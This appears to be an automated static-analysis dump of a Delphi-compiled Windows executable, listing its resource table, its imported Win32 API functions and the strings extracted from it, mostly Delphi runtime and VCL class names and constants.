RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_DIALOG 0x00095a4c 0x00000052 LANG_NEUTRAL SUBLANG_NEUTRAL 2.56 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_STRING 0x00098b00 0x000002c4 LANG_NEUTRAL SUBLANG_NEUTRAL 3.18 None
RT_RCDATA 0x000994c8 0x000000ef LANG_ENGLISH SUBLANG_ENGLISH_US 7.10 None
RT_RCDATA 0x000994c8 0x000000ef LANG_ENGLISH SUBLANG_ENGLISH_US 7.10 None
RT_RCDATA 0x000994c8 0x000000ef LANG_ENGLISH SUBLANG_ENGLISH_US 7.10 None
RT_RCDATA 0x000994c8 0x000000ef LANG_ENGLISH SUBLANG_ENGLISH_US 7.10 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_CURSOR 0x00099630 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL 2.02 None
RT_GROUP_ICON 0x00099644 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US 1.84 None

Imports

0x46713c VirtualFree
0x467140 VirtualAlloc
0x467144 LocalFree
0x467148 LocalAlloc
0x46714c GetVersion
0x467150 GetCurrentThreadId
0x46715c VirtualQuery
0x467160 WideCharToMultiByte
0x467164 MultiByteToWideChar
0x467168 lstrlenA
0x46716c lstrcpynA
0x467170 LoadLibraryExA
0x467174 GetThreadLocale
0x467178 GetStartupInfoA
0x46717c GetProcAddress
0x467180 GetModuleHandleA
0x467184 GetModuleFileNameA
0x467188 GetLocaleInfoA
0x46718c GetCommandLineA
0x467190 FreeLibrary
0x467194 FindFirstFileA
0x467198 FindClose
0x46719c ExitProcess
0x4671a0 WriteFile
0x4671a8 RtlUnwind
0x4671ac RaiseException
0x4671b0 GetStdHandle
0x4671b8 GetKeyboardType
0x4671bc LoadStringA
0x4671c0 MessageBoxA
0x4671c4 CharNextA
0x4671cc RegQueryValueExA
0x4671d0 RegOpenKeyExA
0x4671d4 RegCloseKey
0x4671dc SysFreeString
0x4671e0 SysReAllocStringLen
0x4671e4 SysAllocStringLen
0x4671ec TlsSetValue
0x4671f0 TlsGetValue
0x4671f4 LocalAlloc
0x4671f8 GetModuleHandleA
0x467200 RegQueryValueExA
0x467204 RegOpenKeyExA
0x467208 RegCloseKey
0x467210 lstrcpyA
0x467214 WriteFile
0x46721c WaitForSingleObject
0x467220 VirtualQuery
0x467224 VirtualAlloc
0x467228 Sleep
0x46722c SizeofResource
0x467230 SetThreadPriority
0x467234 SetThreadLocale
0x467238 SetFilePointer
0x46723c SetEvent
0x467240 SetErrorMode
0x467244 SetEndOfFile
0x467248 ResetEvent
0x46724c ReadFile
0x467250 MulDiv
0x467254 LockResource
0x467258 LoadResource
0x46725c LoadLibraryA
0x467268 GlobalUnlock
0x46726c GlobalReAlloc
0x467270 GlobalHandle
0x467274 GlobalLock
0x467278 GlobalFree
0x46727c GlobalFindAtomA
0x467280 GlobalDeleteAtom
0x467284 GlobalAlloc
0x467288 GlobalAddAtomA
0x46728c GetVersionExA
0x467290 GetVersion
0x467294 GetTickCount
0x467298 GetThreadLocale
0x46729c GetTempPathA
0x4672a0 GetSystemInfo
0x4672a4 GetStringTypeExA
0x4672a8 GetStdHandle
0x4672ac GetProcAddress
0x4672b0 GetModuleHandleA
0x4672b4 GetModuleFileNameA
0x4672b8 GetLocaleInfoA
0x4672bc GetLocalTime
0x4672c0 GetLastError
0x4672c4 GetFullPathNameA
0x4672c8 GetFileSize
0x4672cc GetDiskFreeSpaceA
0x4672d0 GetDateFormatA
0x4672d4 GetCurrentThreadId
0x4672d8 GetCurrentProcessId
0x4672dc GetCPInfo
0x4672e0 GetACP
0x4672e4 FreeResource
0x4672e8 InterlockedExchange
0x4672ec FreeLibrary
0x4672f0 FormatMessageA
0x4672f4 FindResourceA
0x4672f8 EnumCalendarInfoA
0x467304 CreateThread
0x467308 CreateFileA
0x46730c CreateEventA
0x467310 CopyFileA
0x467314 CompareStringA
0x467318 CloseHandle
0x467320 VerQueryValueA
0x467328 GetFileVersionInfoA
0x467330 UnrealizeObject
0x467334 StretchBlt
0x467338 SetWindowOrgEx
0x46733c SetViewportOrgEx
0x467340 SetTextColor
0x467344 SetStretchBltMode
0x467348 SetROP2
0x46734c SetPixel
0x467350 SetDIBColorTable
0x467354 SetBrushOrgEx
0x467358 SetBkMode
0x46735c SetBkColor
0x467360 SelectPalette
0x467364 SelectObject
0x467368 SaveDC
0x46736c RestoreDC
0x467370 RectVisible
0x467374 RealizePalette
0x467378 PatBlt
0x46737c MoveToEx
0x467380 MaskBlt
0x467384 LineTo
0x467388 IntersectClipRect
0x46738c GetWindowOrgEx
0x467390 GetTextMetricsA
0x46739c GetStockObject
0x4673a0 GetPixel
0x4673a4 GetPaletteEntries
0x4673a8 GetObjectA
0x4673ac GetDeviceCaps
0x4673b0 GetDIBits
0x4673b4 GetDIBColorTable
0x4673b8 GetDCOrgEx
0x4673c0 GetClipBox
0x4673c4 GetBrushOrgEx
0x4673c8 GetBitmapBits
0x4673cc ExcludeClipRect
0x4673d0 DeleteObject
0x4673d4 DeleteDC
0x4673d8 CreateSolidBrush
0x4673dc CreatePenIndirect
0x4673e0 CreatePalette
0x4673e8 CreateFontIndirectA
0x4673ec CreateDIBitmap
0x4673f0 CreateDIBSection
0x4673f4 CreateCompatibleDC
0x4673fc CreateBrushIndirect
0x467400 CreateBitmap
0x467404 BitBlt
0x46740c CreateWindowExA
0x467410 WindowFromPoint
0x467414 WinHelpA
0x467418 WaitMessage
0x46741c UpdateWindow
0x467420 UnregisterClassA
0x467424 UnhookWindowsHookEx
0x467428 TranslateMessage
0x467430 TrackPopupMenu
0x467438 ShowWindow
0x46743c ShowScrollBar
0x467440 ShowOwnedPopups
0x467444 ShowCursor
0x467448 SetWindowsHookExA
0x46744c SetWindowPos
0x467450 SetWindowPlacement
0x467454 SetWindowLongA
0x467458 SetTimer
0x46745c SetScrollRange
0x467460 SetScrollPos
0x467464 SetScrollInfo
0x467468 SetRect
0x46746c SetPropA
0x467470 SetParent
0x467474 SetMenuItemInfoA
0x467478 SetMenu
0x46747c SetForegroundWindow
0x467480 SetFocus
0x467484 SetCursor
0x467488 SetClassLongA
0x46748c SetCapture
0x467490 SetActiveWindow
0x467494 SendMessageA
0x467498 ScrollWindow
0x46749c ScreenToClient
0x4674a0 RemovePropA
0x4674a4 RemoveMenu
0x4674a8 ReleaseDC
0x4674ac ReleaseCapture
0x4674b8 RegisterClassA
0x4674bc RedrawWindow
0x4674c0 PtInRect
0x4674c4 PostQuitMessage
0x4674c8 PostMessageA
0x4674cc PeekMessageA
0x4674d0 OffsetRect
0x4674d4 OemToCharA
0x4674d8 MessageBoxA
0x4674dc MapWindowPoints
0x4674e0 MapVirtualKeyA
0x4674e4 LoadStringA
0x4674e8 LoadKeyboardLayoutA
0x4674ec LoadIconA
0x4674f0 LoadCursorA
0x4674f4 LoadBitmapA
0x4674f8 KillTimer
0x4674fc IsZoomed
0x467500 IsWindowVisible
0x467504 IsWindowEnabled
0x467508 IsWindow
0x46750c IsRectEmpty
0x467510 IsIconic
0x467514 IsDialogMessageA
0x467518 IsChild
0x46751c InvalidateRect
0x467520 IntersectRect
0x467524 InsertMenuItemA
0x467528 InsertMenuA
0x46752c InflateRect
0x467534 GetWindowTextA
0x467538 GetWindowRect
0x46753c GetWindowPlacement
0x467540 GetWindowLongA
0x467544 GetWindowDC
0x467548 GetTopWindow
0x46754c GetSystemMetrics
0x467550 GetSystemMenu
0x467554 GetSysColorBrush
0x467558 GetSysColor
0x46755c GetSubMenu
0x467560 GetScrollRange
0x467564 GetScrollPos
0x467568 GetScrollInfo
0x46756c GetPropA
0x467570 GetParent
0x467574 GetWindow
0x467578 GetMenuStringA
0x46757c GetMenuState
0x467580 GetMenuItemInfoA
0x467584 GetMenuItemID
0x467588 GetMenuItemCount
0x46758c GetMenu
0x467590 GetLastActivePopup
0x467594 GetKeyboardState
0x46759c GetKeyboardLayout
0x4675a0 GetKeyState
0x4675a4 GetKeyNameTextA
0x4675a8 GetIconInfo
0x4675ac GetForegroundWindow
0x4675b0 GetFocus
0x4675b4 GetDlgItem
0x4675b8 GetDesktopWindow
0x4675bc GetDCEx
0x4675c0 GetDC
0x4675c4 GetCursorPos
0x4675c8 GetCursor
0x4675cc GetClientRect
0x4675d0 GetClassNameA
0x4675d4 GetClassInfoA
0x4675d8 GetCapture
0x4675dc GetActiveWindow
0x4675e0 FrameRect
0x4675e4 FindWindowA
0x4675e8 FillRect
0x4675ec EqualRect
0x4675f0 EnumWindows
0x4675f4 EnumThreadWindows
0x4675f8 EndPaint
0x4675fc EnableWindow
0x467600 EnableScrollBar
0x467604 EnableMenuItem
0x467608 DrawTextA
0x46760c DrawMenuBar
0x467610 DrawIconEx
0x467614 DrawIcon
0x467618 DrawFrameControl
0x46761c DrawEdge
0x467620 DispatchMessageA
0x467624 DestroyWindow
0x467628 DestroyMenu
0x46762c DestroyIcon
0x467630 DestroyCursor
0x467634 DeleteMenu
0x467638 DefWindowProcA
0x46763c DefMDIChildProcA
0x467640 DefFrameProcA
0x467644 CreatePopupMenu
0x467648 CreateMenu
0x46764c CreateIcon
0x467650 ClientToScreen
0x467654 CheckMenuItem
0x467658 CallWindowProcA
0x46765c CallNextHookEx
0x467660 BeginPaint
0x467664 CharNextA
0x467668 CharLowerA
0x46766c CharToOemA
0x467670 AdjustWindowRectEx
0x46767c Sleep
0x467684 SafeArrayPtrOfIndex
0x467688 SafeArrayGetUBound
0x46768c SafeArrayGetLBound
0x467690 SafeArrayCreate
0x467694 VariantChangeType
0x467698 VariantCopy
0x46769c VariantClear
0x4676a0 VariantInit
0x4676b0 ImageList_Write
0x4676b4 ImageList_Read
0x4676c4 ImageList_DragMove
0x4676c8 ImageList_DragLeave
0x4676cc ImageList_DragEnter
0x4676d0 ImageList_EndDrag
0x4676d4 ImageList_BeginDrag
0x4676d8 ImageList_Remove
0x4676dc ImageList_DrawEx
0x4676e0 ImageList_Draw
0x4676f0 ImageList_Add
0x4676f8 ImageList_Destroy
0x4676fc ImageList_Create
0x467700 InitCommonControls
0x467708 GetOpenFileNameA

This program must be run under Win32
`DATA
.idata
.rdata
P.reloc
P.rsrc
Boolean
False
Smallint
Integer
Cardinal
String
TObject
TObject
System
IInterface
System
TInterfacedObject
TDateTime
SVWUQ
Z]_^[
YZ]_^[
w;;t$
SVWUQ
Z]_^[
YZ]_^[
_^[YY]
_^[Y]
YZ]_^[
_^[Y]
C<"u1S
Q<"u8S
,$YXZ
~KxI[)
BkU'9
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
PPRTj
YZXtp
YZXtm1
ZTUWVSPRTj
t=HtN
t-Rf;
t f;J
SVWRP
Z_^[X
tVSVWU
t1SVW
t-Rf;
t f;J
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
FFF;M
^[YY]
Uhe^@
odSelected
odGrayed
odDisabled
odChecked
odFocused
odDefault
odHotLight
odInactive
odNoAccel
odNoFocusRect
odReserved1
odReserved2
odComboBoxEdit
Windows
TOwnerDrawState
_^[Y]
_^[Y]
_^[Y]
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
TFileName
Exception
EHeapException
EOutOfMemory
EInOutError
EExternal
EExternalException
EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide
EOverflow
EUnderflow
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
SWSVj
False
_^[Y]
$Z_^[
$Z_^[
^[YY]
<*t"<0r=<9w9i
INFNAN
QS<$t
_^[YY]
_^[YY]
$YZ_^[
t%HtIHtm
AM/PM
_^[YY]
SVWUQ
$Z]_^[
_^[Y]
QQQQQQSVW3
QQQQQSVW
D$PPj
D$LPj
_^[Y]
_^[YY]
TErrorRec
TExceptRec
t<HtH
$YZ^[
$YZ^[
WUWSj
YZ]_^[
_^[Y]
m/d/yy
mmmm d, yyyy
AMPM
AMPM
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
SVWUQ
(Z]_^[
SVWUQ
;w$t|
Z]_^[
;F$t=
;C$t4
_^[Y]
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarOr
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantType
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgError
EVariantBadVarTypeErrorp
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError
EVariantDispatchError
t?Htb
QQQQSV
Empty
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Error
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
Int64
String
Array
ByRef
Variants
_^[YY]
_^[Y]
SVWUQ
Z]_^[
t~h$hF
_^[Y]
False
_^[Y]
_^[YY]
$YZ^[
TBiDiMode
bdLeftToRight
bdRightToLeft
bdRightToLeftNoAlign
bdRightToLeftReadingOnly
Classes
ssShift
ssAlt
ssCtrl
ssLeft
ssRight
ssMiddle
ssDouble
Classes
TShiftState
THelpContext
THelpType
htKeyword
htContext
Classes
TShortCut
TNotifyEvent
Sender
TObject
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerError(
EReadError
EWriteError
EClassNotFound
EResNotFound
EListError
EBitsError
EStringListError
EComponentError
EOutOfResourcesX
EInvalidOperation
TList
TThreadListt
TBits
TPersistent
TPersistent
Classes
TInterfacedPersistent
TInterfacedPersistent
Classes
IStringsAdapter,
Classes
TStrings
TStrings
Classes
TStringItem
TStringList|
TStringList
Classes
TStream\
THandleStream
TFileStreamH
TCustomMemoryStream
TMemoryStream
TResourceStream
TStreamAdapter
TClassFinder
TFiler
TReader
EThread
TComponentName
IDesignerNotify,
Classes
TComponent
TComponent
Classes
NameT
TBasicActionLink
TBasicAction
TBasicAction
Classes
TIdentMapEntry
TRegGroup
TRegGroups
YZ]_^[
_^[Y]
_^[Y]
SVWUQ
u%CNu
Z]_^[
SVWUQ
$Z]_^[
SVWUQ
Z]_^[
SVWUQ
Z]_^[
SVWUQ
Z]_^[
SVWUQ
$Z]_^[
UhW1A
_^[YY]
Uh&2A
UhR3A
TIntConst
Uh25A
_^[Y]
_^[Y]
_^[YY]
_^[Y]
UhB9A
Uh#9A
Uh4>A
SVWUQ
Z]_^[
UhBAA
UhNCA
Uh{DA
Uh^DA
W<CNu
PhLMA
Strings
Uh GA
_^[Y]
UhiHA
S$_^[Y]
UhULA
Uh8LA
^[YY]
_^[YY]
SVWUQ
SdZ]_^[
UhGNA
Uh+OA
UhrPA
SVWUQ
$Z]_^[
^[YY]
Uh5]A
Uh_`A
_^[Y]
TPropFixup
TPropIntfFixup
UhNdA
_^[YY]
Owner
UhjfA
UhKfA
Uh3gA
_^[YY]
_^[Y]
C0_^[
Classes
_^[Y]
UhNqA
Uh"qA
UhktA
UhSuA
Uh*vA
False
UhEzA
_^[YY]
QQQQ3
Uh'}A
%s_%d
_^[YY]
^[YY]
QQQQQQQS
SVWUQ
Z]_^[
_^[Y]
S _^[
SVWUQ
Z]_^[
YZ_^[
SVWUQ
Z]_^[
G0_^[
;CDt:
R0_^[]
_^[YY]
TPUtilWindow
TColor
EInvalidGraphic
EInvalidGraphicOperation
TFontPitch
fpDefault
fpVariable
fpFixed
Graphics
TFontName
TFontCharset
TFontStyle
fsBold
fsItalic
fsUnderline
fsStrikeOut
Graphics
TFontStyles
TPenStyle
psSolid
psDash
psDot
psDashDot
psDashDotDot
psClear
psInsideFrame
Graphics
TPenMode
pmBlack
pmWhite
pmNop
pmNot
pmCopy
pmNotCopy
pmMergePenNot
pmMaskPenNot
pmMergeNotPen
pmMaskNotPen
pmMerge
pmNotMerge
pmMask
pmNotMask
pmXor
pmNotXor
Graphics
TBrushStyle
bsSolid
bsClear
bsHorizontal
bsVertical
bsFDiagonal
bsBDiagonal
bsCross
bsDiagCross
Graphics
TGraphicsObject
TGraphicsObject
Graphics
IChangeNotifier,
Graphics
TFont
TFont
Graphics
Charset0
ColorT
HeightP
PitchT
Style
TPen
Graphics
ColorL
StyleT
Width
TBrush
TBrush
Graphics
Color
Style
TCanvas
TCanvas
Graphics
BrushT
CopyMode
Font4
TGraphic
TGraphich
Graphics
TSharedImage
TBitmapImage
TBitmap
TBitmap
Graphics
TIconImage
TIcon
TIconT
Graphics
TResourceManager
^[YY]
_^[YY]
_^[Y]
^[YY]
clBlack
clMaroon
clGreen
clOlive
clNavy
clPurple
clTeal
clGray
clSilver
clRed
clLime
clYellow
clBlue
clFuchsia
clAqua
clWhite
clMoneyGreen
clSkyBlue
clCream
clMedGray
clActiveBorder
clActiveCaption
clAppWorkSpace
clBackground
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clDefault
clGradientActiveCaption
clGradientInactiveCaption
clGrayText
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clMenu
clMenuBar
clMenuHighlight
clMenuText
clNone
clScrollBar
cl3DDkShadow
cl3DLight
clWindow
clWindowFrame
clWindowText
ANSI_CHARSET
DEFAULT_CHARSET
SYMBOL_CHARSET
MAC_CHARSET
SHIFTJIS_CHARSET
HANGEUL_CHARSET
JOHAB_CHARSET
GB2312_CHARSET
CHINESEBIG5_CHARSET
GREEK_CHARSET
TURKISH_CHARSET
HEBREW_CHARSET
ARABIC_CHARSET
BALTIC_CHARSET
RUSSIAN_CHARSET
THAI_CHARSET
EASTEUROPE_CHARSET
OEM_CHARSET
Default
_^[Y]
$YZ^[
E$PVSj
YZ_^[
$Z_^[
_^[YY]
C ;C$s
TBitmapCanvas
TBitmapCanvas
Graphics
@pPV3
_^[YY]
<$BMt
T]_^[
s(;~ t8
D$*Ph
C(_^[Y]
\$4Vj
SVWjH
TPatternManagerSV
_^[YY]
TObjectList
TOrderedList
TStack
comctl32.dll
InitCommonControlsEx
UhM#B
_^[Y]
GetMonitorInfoA
